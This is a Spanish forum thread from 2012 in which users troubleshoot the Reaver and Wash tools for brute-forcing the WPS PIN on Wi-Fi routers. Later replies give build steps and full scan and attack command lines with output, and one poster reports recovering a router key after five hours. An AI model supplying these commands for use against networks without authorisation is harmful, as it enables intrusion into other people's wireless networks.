?>/script>'; } ?> Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi Widgets Magazine

Autor Tema: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi  (Leído 415306 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Mc_Roy

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #140 en: 15-01-2012, 17:47 (Domingo) »
Acabo de descubrir esto del reaver y parece un gran trabajo!! Se ve que faltan pulir algunas cosas pero para eso está el tiempo!!

Estoy bajando wifiway 3.4 para probar walsh y reaver con una WifiLink 5100 (que no creo que vaya) y una ubitiqui (ar9271, en los comentarios del source parece que si que funciona).

Por cierto que para los que tengais Tablets Android con Honeycomb, en el apartado de Redes Wifi al alcance se puede ver cuales tienen WPS y cuales no ya que indica el tipo de cifrado, y un programa para android llamado WLANaudit tambien nos lo indica.

Saludossss

dhm33

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #141 en: 15-01-2012, 18:21 (Domingo) »
Hola!queria comentaros que usando reaver  en 5 horas me dio la clave de un router con mac tipo:00:19:15.... de movistar

Clave probada y correcta

ñandu

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #142 en: 15-01-2012, 18:24 (Domingo) »
que version de reaver y que tipo de tarjeta usaste

PELIGRO

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #143 en: 15-01-2012, 18:28 (Domingo) »
Warcry, me parece que no es muy dificil de entender....si lo hago normal, como todo el mundo dice walsh no saca nada de nada....efectivamente, y cambiando despues la mac, que en teoria lo pone para reaver,,,entonces si me funciona el walsh sacandome los routers con wps...y luego arranco el reaver pero se me queda como puse en la captura.

por que no me pones como he hecho yo lo que haces para que te funcione el walsh,

por que desde luego yo estoy flipando

PD: ahora tengo que ausentarme luego lo miro. 8)

Yo no se cuales son los motivos, pero si que se que al cambiar la mac, y poner el comando walsh -i mon0, es cuando si que funciona, para explicarme mejor, si no cambio la mac no funciona, pero si la cambio si que dice cuales son vulnerables, posteriormente he comprobado que dos solo por curiosidad, y efectivamente walsh no se ha confundido

Shyraz

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #144 en: 15-01-2012, 18:32 (Domingo) »
Parece q algunos routers se defienden, este es el mensaje q me aparece después de estar como 5 minutos comprobando pins reaver:

Código: [Seleccionar]
warning:detected AP rate limiting, waiting 315 seconds before re-trying

« Última modificación: 15-01-2012, 20:14 (Domingo) por Shyraz »

alist3r

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #145 en: 15-01-2012, 18:33 (Domingo) »
Parece q algunos routers se defienden, este es el mensaje q me aparece después de estar como 5 minutos comprobando pins reaver:

Código: [Seleccionar]
warning:detected AP rate limiting, waiting 315 seconds before re-trying

También decir q el Ap se encuentra lejos, y q para comprobar un pin necesita varios envios, quizás el warning sea debido a eso, o a un método de defensa de algunos APs?
ojala sea eso

chinitiw

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #146 en: 15-01-2012, 19:24 (Domingo) »
Parece q algunos routers se defienden, este es el mensaje q me aparece después de estar como 5 minutos comprobando pins reaver:

Código: [Seleccionar]
warning:detected AP rate limiting, waiting 315 seconds before re-trying

También decir q el Ap se encuentra lejos, y q para comprobar un pin necesita varios envios, quizás el warning sea debido a eso, o a un método de defensa de algunos APs?

warcry

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #147 en: 15-01-2012, 19:47 (Domingo) »

Yo no se cuales son los motivos, pero si que se que al cambiar la mac, y poner el comando walsh -i mon0, es cuando si que funciona, para explicarme mejor, si no cambio la mac no funciona, pero si la cambio si que dice cuales son vulnerables, posteriormente he comprobado que dos solo por curiosidad, y efectivamente walsh no se ha confundido

te digo lo mismo que a pericondecapiskol, pon como lo haces exactamente con la captura de la pantalla de la consola.

primero porque no me lo creo, ya lo he hecho yo y nada de nada

y segundo porque no tiene ningun sentido que walsh solo funcione cambiando la mac

lema442

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #148 en: 15-01-2012, 21:42 (Domingo) »
Buenas quiero comentar que por alguna razon no puedo usar wlash siempre me tira un mensaje en ingles que no recuerdo, solo recuerdo que aparece la palabra skiping alfinal.
Utilizo la alfa de 1w y un planar de 15db.
He intentado con la red de vecino jazztel_xxxx con su consentimiento, y me da la sensacion de mucha inestabilidad en la operacion, una distancia de un piso entre su casa y la mia. lo maximo que he conseguido es un progreso de 0.02 en una red ono wpa de las nuevas y tambien sensacion de mucha inestabilidad con multiples reintentos de la misma clave wps, vamos que si en el post aparece que en 20 hoiras por ejemplo, yo tenia la sensacion de que estaria dias asi.
Necesitaria poder hacer funcionar el wlash. No puedes ir dando palos de ciego.

warcry

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #149 en: 15-01-2012, 21:52 (Domingo) »
pues a mi el walsh me saca esto:

Código: [Seleccionar]
wifiway ~ # airmon-ng start wlan0


Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
4828    dhcpcd


Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy2]
                                (monitor mode enabled on mon0)

wifiway ~ # walsh -i mon0

Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       WPS Version       WPS Locked        ESSID
----------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
^C
wifiway ~ #                                                                      

entiendo que funciona y no tengo ningun router con wps cerca.

a ver alma de cántaro, hay que leer mas

comando a utilizar el mismo que me dijeron a mi en su día

walsh -i mon0 -C

la versión de walsh 1.4 no funcionan, estoy esperando a que confirmen lo del cambio de mac.

busca la versión de reaver 1.3 que esa si funciona.

otra opcion es mirarlo como dice gorila.maguila con el wireshark pero claro igual no lo has visto porque esta en la pagina anterior ;)


alist3r

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #150 en: 16-01-2012, 00:51 (Lunes) »
otra opcion es mirarlo como dice gorila.maguila con el wireshark pero claro igual no lo has visto porque esta en la pagina anterior ;)

"entre fina y muy fina", ahora soy yo quien te lo dice a tí, socio xD

warcry

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #151 en: 16-01-2012, 01:01 (Lunes) »
"entre fina y muy fina", ahora soy yo quien te lo dice a tí, socio xD

es que soy de villafino ;D

bueno bromas a parte y sin ofender a nadie que yo meto la pata como el que mas, a ver si peligro y pericondecapiskol, ponen exactamente lo que han hecho para hacer funcionar el walsh, ya que yo he modificado la mac y nada de nada.

y o soy el tío mas inútil del mundo (que puede ser) o esta vez no me he columpiado yo

xexudj89

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #152 en: 16-01-2012, 04:18 (Lunes) »
yo he probado cambiando la mac y nada!el walsh sigue igual,, asi que opino lo mismo que warcry esperando aver si pone como lo ha echo

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 15986
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #153 en: 16-01-2012, 05:46 (Lunes) »
cuando monte la iso , lo probe con un chipset atheros 5005 y funcionaba perfecto,.

Hoy , al ver todo esto pruebo con un ar9271 que antes funcionaba  ,y " o " , ...sorpresa , ¡¡¡ no va !!!

lo mirare.

si os bajais de los modulos la version 1.3 y no se lanza desde el menu de wifiway , ...podeis usarlo desde consola , que tambien esta en la version 1.3 el walsh.

PELIGRO

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #154 en: 16-01-2012, 10:29 (Lunes) »
He vuelto a intentarlo, cambiando la mac, y parece ser que este no es el error, porque ahora no me funciona. Ya dije que no entendia porque si que me habia funcionado la otra vez con la mac cambiada.
Seguire probando y haber si consigo enterarme porque la otra vez si y ahora no,porque ni yo mismo lo entiendo, hare la captura, para que gente mas entendida en estos temas lo analice haber si puede aportar algo de luz.

labiba8

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #155 en: 16-01-2012, 14:25 (Lunes) »
hola usuarionuevo.

tampoco reconoce la tarjeta con el chip AR9170, a cambio en wifiway 2.0.3 se la reconoce.
un saludo.

ferlan

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #156 en: 16-01-2012, 17:56 (Lunes) »
Distintas distros.
Distintas versiones de Wifiway.
Distintas versiones de reaver.
Distintas revisiones de una misma versión de reaver.
Interfaces basadas en distintos chips.
...
...

Demasiadas variables a considerar para estar hablando de una misma cosa.

Versión actual sobre la que están trabajando sus creadores: reaver v1.4 r93

Mi experiencia desde Wifiway 3.0 Live USB:

Quitar módulo reaver-1.3.xzm, (si es que lo tienes en tu Wifiway actual).
Desde su página oficial, bajar, compilar e instalar la actual versión en revisión r93.

Para ello, estando conectado a la red, consola y:

svn checkout http://reaver-wps.googlecode.com/svn/trunk

Cuando termine la descarga:

cd trunk
cd src
./configure
make
make install

Desde la r87, walsh ya no se llama así, sino wash, por lo tanto, para ver tu red con WPS y su estado de activación, consola y:


wifiway ~ # wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       WPS Version       WPS Locked        ESSID
----------------------------------------------------------------------------------------------
XX:68:0C:XX:XX:33      11            1.0               N                 WLAN_XXXX
XX:25:2C:XX:XX:04      11            1.0               N                 WiFiXXXXXX

Para aprobar su eficacia:

wifiway ~ # reaver -i mon0 -b XX:25:2C:XX:XX:04 -c 11  -e WiFiXXXXXX -vv  (son dos v no una w)
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Switching mon0 to channel 11
  • Waiting for beacon from XX:XX:2C:B2:XX:XX
  • Associated with XX:25:2C:XX:XX:XX (ESSID: WiFiXXXXXX)
  • Trying pin 80875673
  • Sending EAPOL START request
  • Sending identity response

      ...
      ...

Lógicamente, al tratarse de una Live sin permanent changes, si lo quieres conservar, te tendrás que hacer un módulo .xzm.

Info obtenida en la página oficial (en inglés).
https://code.google.com/p/reaver-wps/w/list
« Última modificación: 16-01-2012, 18:15 (Lunes) por ferlan »

warcry

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #157 en: 16-01-2012, 18:40 (Lunes) »
Distintas distros.
Distintas versiones de Wifiway.
Distintas versiones de reaver.
Distintas revisiones de una misma versión de reaver.
Interfaces basadas en distintos chips.
...
...

Demasiadas variables a considerar para estar hablando de una misma cosa.

Versión actual sobre la que están trabajando sus creadores: reaver v1.4 r93

Mi experiencia desde Wifiway 3.0 Live USB:

Quitar módulo reaver-1.3.xzm, (si es que lo tienes en tu Wifiway actual).
Desde su página oficial, bajar, compilar e instalar la actual versión en revisión r93.

Para ello, estando conectado a la red, consola y:

svn checkout http://reaver-wps.googlecode.com/svn/trunk

Cuando termine la descarga:

cd trunk
cd src
./configure
make
make install

Desde la r87, walsh ya no se llama así, sino wash, por lo tanto, para ver tu red con WPS y su estado de activación, consola y:


wifiway ~ # wash -i mon0 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       WPS Version       WPS Locked        ESSID
----------------------------------------------------------------------------------------------
XX:68:0C:XX:XX:33      11            1.0               N                 WLAN_XXXX
XX:25:2C:XX:XX:04      11            1.0               N                 WiFiXXXXXX

Para aprobar su eficacia:

wifiway ~ # reaver -i mon0 -b XX:25:2C:XX:XX:04 -c 11  -e WiFiXXXXXX -vv  (son dos v no una w)
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Switching mon0 to channel 11
  • Waiting for beacon from XX:XX:2C:B2:XX:XX
  • Associated with XX:25:2C:XX:XX:XX (ESSID: WiFiXXXXXX)
  • Trying pin 80875673
  • Sending EAPOL START request
  • Sending identity response

      ...
      ...

Lógicamente, al tratarse de una Live sin permanent changes, si lo quieres conservar, te tendrás que hacer un módulo .xzm.

Info obtenida en la página oficial (en inglés).
https://code.google.com/p/reaver-wps/w/list

yo no se que version tendra de reaver 1.4 del wifiway 3.4, pero acabo de probar lo de "wash" y me ha dicho que te lo comas tu, que asi tampoco funciona.

y para hacer un modulo con toda esta historieta, coges el xmz que ya esta hecho del reaver 1.3 que ese si que funciona.

alist3r

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #158 en: 16-01-2012, 18:50 (Lunes) »
creo que perdeis el culo tratando de cazar bugs que son debidos a la efervescencia del código, y que tambien desaparecen de una version a otro por exactamente el mismo motivo.

vais derrochando energías para sacar nada en claro.

esto es una beta señores. un poco de calma.
queda mucho por ver.

chinitiw

  • Visitante
Re: Vulnerabilidad grave Wi-Fi Protected Setup (WPS) en routers Wi-Fi
« Respuesta #159 en: 16-01-2012, 18:54 (Lunes) »
buenas, me lo he compilado (bajandolo por svn) lo ultimo , cuando lanzo reaver 1.4r93 con la wifistation Ext al rato de empezar "segmentation fault)